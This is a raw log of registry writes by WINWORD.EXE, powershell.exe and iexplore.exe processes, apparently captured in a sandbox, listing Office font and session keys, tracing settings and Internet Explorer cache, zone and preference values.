WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
26057691
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common
QMSessionCount
3
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\General
LastAutoSavePurgeTime
26057694
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482688
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482689
2080
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E
LanguageList
en-US
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2080
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPDaysSinceLastAutoMigration
2
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchLowDateTime
574382480
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPLastLaunchHighDateTime
30752120
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
874544980
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30752120
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000079000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{5FD5F305-A96B-11E9-9FBD-5254004AAD21}
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
3
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070700040012000E0032001A002F03
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
3
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
BackupDefaultSearchScope
00000000A6070000902177F5137A5B298E3CBA3ECC6CAA7155BF23ADCDB089B52C68BA84179DD4D258EA4F16BB3FCD62928BF51C79C46226ECC626E6C0BA4A4681E91E639638DEB542B87D580DF657A1B4074C019A6F0191CB621B697606E93A17A84FA0261DB2F5C6AA5DEE683EC933A2D0C747DD3446CE2CB4D4620F3241A035C4E55EF4EA803B89E20D9F9EB6F47E9D068298F3B2E75F40DAA6D055DFB5DBA35C7652294186D33E7F56591E00C93F86C956219B89DA8A84F5B781BDADFBB02592F09CFCC0210B4BA1661707BB87E0BB39459D9959DA3800262262B63CE55D9384BC80ED08051FC0683014B9864FD79077FE2D15C28871388B2015E52C36C7095402E121BAA1BAFEF35E503A03CD1BADA0360406649F60F94500E5761EA3AFC320A9929774EE06EB64D46583D086A7A3D719D728DFDBEAA5745DFD54B0D005530AF47A53D8DC4508DAE6ACC68F5D0BB73BDB2F48D387D449399BF72583BA3ADB30EE80B484FF05447509B025DFE40D97ECAA7C7AE0317B11B220BA1237DAB03EB4584F981928DB845491F2CE5FE160830AC8FF3FA6AE18D5007CA0F06C0F32AAB4B0E3313834B39E993F02F4B14D639AB5118284C4959A944310FAF2C2877E3F5239EFFB7F80AEEF63F6DC0B74F5F3930D47E1BDDC1E0A399C2BDA84D92EE4BDAC79074090ED9326D22CA48E47C25165336862C98D8580F729B32C7A527FE915E4E6A4F2090CC8790693A5FDCCB6116F4553DEC27784AEA00B652A61CB3808A1182CF6B48B28E6911EBAAA68A2B11F226475BAAB3A6BF47F63340F3AE5F47A476A7F8161B7EED3A03CFA9FE3687AD06EB000AE0576E7034B4F4B2BE0404B1189F8708FAB2B4E77067FCA85A5C04E034D490E5F72CBBC1CC9F0B33DCD7CFC20EEE49871408949F14B07BEBB56495958584FEBC62DD946CF916601208A39727B734D1F90EA6F6E6F9BF37D8F92A25C6F1FE2F86A4240BB526ED232C57C18DE7AFA52C24A277FF3858F659721CE6D203B73222B6841A0F36EB452348311B7FA1C7D15EBA83C57DF22B97CFA9D2B496365422F1D4AFD982AEEB8078DB02FB78B2A89B4CCDAA6981E092758DABAB1D5C7BF242938B3CBCABDA87B127394A8B8A6764B515F8A4BE3E6E27019A4920AB37AC629301ED3A8D5CB172E91349BC75A8424D30AABF9CCD6E6D99DDE6CC450826B333964E9B3FC591A7C89A5A8EBB23D7E054C01D8F6611346CCC7C93BEAEDE1A59F2DE5874DD0F68597A56E113EAC0136FFF6544D9857380F0713F9C45D26728F385BD3B673854CEBEF340D800A27478C8C3A25A1D1A9E64398178EBA4C6CD4A37E054E7E880FFB08A712A0770361AD6A43B99292D06EBED92865A8131BB1A60D1A1276500924A383E2BF483FE512D4806D2CBD3630C15ED86DAD66D31C068A94BDFF6B53E64EE4A8BF6F26D091D65CDBBACBC491F67468BC26E2EA06937B1FB117E54DBFA9035E41DC1B58D37B8AE529F227C90068377A74AD0B53EA089D0459D6F13C237158B1DD6AADFFBA62EF0F2BC3F6EAD1A6E135741054C1B0EF13DBBEB7B55828B6827C10DB933B2E62757BD39D10498920673A38C58753069A244395AEC7C102E6AF613311442DF44B4EC7759C7D0585D5D427CDE6C22BA37DDBDBC415CF979ACCA8FFC02809F36F5514943D7FED3DE562509EE4005568D8C63E45CDEDC0FAFDC9C5F6B4CDD3AEB613A9821EB759132AE4CC3D2F71092A8C3D4D209034EE0A36DAB3E67124677F22C9E231D47FAFA5FCA7E9A58D5508917B7CAB0B2046B6E71C730D6FFB3A6384D9FFBE413B084F154FAA33777A0ABEBCF7737DA8684EA5B1DF274A31D715E7DEEC786B5352B1CF81A7EAC9515D37A7CDE7398E95A3CAA088E32170CC5F42AFAD86644E054C55550B328975D5D17012E36A36D074E920FC8C206B54E047FE4F12D7F523F870A2C5D154B8E8A102644F1E11922AE4133B87DD31073B0DBBEE0D2B0F3608CCE48622F53F7C995606988B9D36FF9684F141879B8CD87DF3D266DD19553AD321EBA9B395A43D2B95BCB8CF820AC9FEF6B65695E6B05C9931F73B87FCB897AA97EDF624D33027B6FC6378E5EC613D24D9356D8EDEF631F369D82F21F5DC3683CEB138B1CD1459612D9AFB21FBC55B83CCA0293FA4AC6FD43A53E4B622266B7A679BC212A597E7FEC625DC58CFD1DFFA715FD5625615D3D844DD6292A410631500012CD37963ACBC689AB18C8725916867465F621541B3B027DA33599C90E25F3A0D1A606BD1E4EDB49F34E3456EEBBF4DDD71690182C9078379023828304FF3B5741A9799B4A6954839EA18281E0ECFC5AE90563AB0CE01F8C5D5C369FB0EDE111F8DCA25AE1D46C630657D507107506EC85045E0A6DD2A26C8D6807F4931AEEED0A27A2E719CEBCC21129DDC2E61FBE7EA954A134EB041AD74A64E8B3F6F7DED9A60C5D3937B73FC4197A9EE120DE6D208E766F326A5022DFB4256AB6D765FAC8CC06A36D0CF53F4D0C1A7A52A9444CEE3D32FA0689A9E450B81A3003A8430CC83D9D275F5E1B255A9063D213D9CB57ACE60263A7A938B972D113BAB6554CBEDAA1940B2EC8670C0298E2582A3BC4B78058F6AE1C133FBC2311430CA655CC1AF8B90C30B793BC6D379D5DDE792A34F67C1ED34B57408C0664444C37E7857AAB27B4C4DA270176830D2D8CD72F48AB0E6453A01D6519BF123C9AA80E70B2489965DC0AA95E88C5775E3D71F4244F90797EF150B649261F19951E64F2654F248FC2C423A06BFF8B843259E4C77C9DA1B19010000000E0000007A67784775642F5046646B2533640200000000000000
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF8000000000200000000001066000000010000200000006C70C245CA6F3F435AF6E076943EB33D684FF998B7A6B7B6FDA07F5744A7E1BD000000000E8000000002000020000000E7E1BDD2F9BFC060E044AEAA3CEE4C74D8184C7C3F41F0355974710264813AE3500000007A6E89B6B86E566E042E5B90E6DDE88654BBBC7504B1EAE6EC96F7C95B58F73DA4CA5383BDB75462E1ED6EBAE7BB8596C4830FFDDA864BF288A625C9CED8B052DF8DC15A8A09F16E2C5329BCA543229840000000B1DB1A204D47228F6B7DA06D729F1C67D78E816189D9DB3B25BA16539EF926EE62AF9F45EBC19291876D4C31B271A97E07AC68C65ED6DC028161FC68A72FA010
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
ChangeNotice
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81
01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF80000000002000000000010660000000100002000000087AB01A9640678B40B89C1D5717AC17D70A7BEB7AC1CA3B4F87E7DC32278A859000000000E8000000002000020000000CA98E9BF25EAE14B91744EDFB4A5B08FB71353784158B571E4AA2D957EDD5E2210000000FA3E6F660CE3C9F392C037A59317EA5E40000000A67E065EBA3DC78656A9B66BFCEF5FD39832C38FCEB7EA7AD3DE0EFA0E10C60A39E14BB83FC04D207A8A7D1C8A4F18A46194089FEB648885DD194E5BC4F6EC81
2448
iexplore.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\71\52C64B7E
LanguageList
en-US
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MINIE
TabBandWidth
500
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionLow
395188358
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionHigh
268435456
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListLastUpdateTime
3668870
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VendorId
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DeviceId
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
SubSysId
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Revision
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionHigh
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionLow
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DXFeatureLevel
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VendorId
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DeviceId
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-SubSysId
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-Revision
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionHigh
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionLow
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DXFeatureLevel
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionLowPart
2
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionHighPart
0
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
2137742680
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30752170
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateLowDateTime
895326230
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateHighDateTime
30752120
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionHigh
268435456
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionLow
395188358
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
1
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
DecayDateQueue
01000000D08C9DDF0115D1118C7A00C04FC297EB0100000077D76C230A80484BAECD07D751B63AF800000000020000000000106600000001000020000000F06E4F14DEE839A4BE5371FDFDA996476F883A477FD6B4AEC44133238650D7B0000000000E8000000002000020000000D40745C5C2B16F288E96622BB4C86CAAF831FD4C542D05D6FCFEF50F78BF843E30000000FC27D1B7A959E4C150BED1D931CC30D33F486E9946E7D59EFBF66B288AF2704EA8A67354A6DA7DA1F3485D234C8AC3C1400000003CBCC52364591E3FDA54772F2E09622E10E68919F81A6BA12C79479687B3888DB78E194848972D5B025A3997635C7ABD2FB7E1F73AA05CCF53939002982C96AB
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage
LastProcessed
F060F437783DD501
2448
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
0
2476
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Content
CachePrefix
2476
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\Cookies
CachePrefix
Cookie:
2476
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\LowCache\History
CachePrefix
Visited:
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
CompatibilityFlags
0
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007A000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
SecuritySafe
1
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active
{7C25DFC5-A96B-11E9-9FBD-5254004AAD21}
0
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
FullScreen
no
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery
Active
0
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Type
3
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Count
4
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Time
E3070700040012000E0033000D00C102
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore
Blocked
4
1440
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\EUPP Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\DSP
BackupDefaultSearchScope
